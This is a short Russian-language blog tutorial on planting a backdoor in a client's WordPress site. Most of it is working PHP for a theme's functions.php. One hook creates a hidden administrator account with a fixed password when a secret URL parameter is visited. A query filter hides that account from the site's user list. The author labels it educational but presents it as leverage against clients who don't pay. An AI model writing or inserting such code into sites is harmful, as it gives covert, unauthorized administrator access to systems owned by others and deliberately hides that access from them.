Как оставить backdoor в сайте на WordPress

Данный материал выкладывается в образовательных целях!
Бывают разные ситуации в жизни, бывают разные заказчики. Иногда нужно себя обезопасить от кидалова. Да может быть 100 честных причин и столько же нечестных для использования backdoor-а в WordPress.

Итак, приступим.
1. Добавляем в файл functions.php активной темы код:
add_action( 'wp_head', 'my_backdoor' );

function my_backdoor() {
if ( md5( $_GET['backdoor'] ) == '34d1f91fb2e514b8576fab1a75a89a6b' ) {
require( 'wp-includes/registration.php' );
if ( !username_exists( 'mr_admin' ) ) {
$user_id = wp_create_user( 'mr_admin', 'pa55w0rd!' );
$user = new WP_User( $user_id );
$user->set_role( 'administrator' );
}
}
}

Что делает этот код? С помощью этого кода мы создаём на сайте нового пользователя «mr_admin» с паролем «pa55w0rd!» и правами администратора.

Для активации кода перейдите по ссылке: http://ВАШ САЙТ/?backdoor=go

После этого можно заходить на сайт с правами администратора.

Для того, чтобы скрыть нашего нового пользователя из списка пользователей, добавьте в functions.php следующий код:

function w45345p_hide_specific_user($user_search) {
global $wpdb;
$user_search->query_where =
str_replace('WHERE 1=1',
"WHERE 1=1 AND {$wpdb->users}.user_login != 'mr_admin'",
$user_search->query_where
);
}
add_action('pre_user_query','w45345p_hide_specific_user');

One Response

Leave a Comment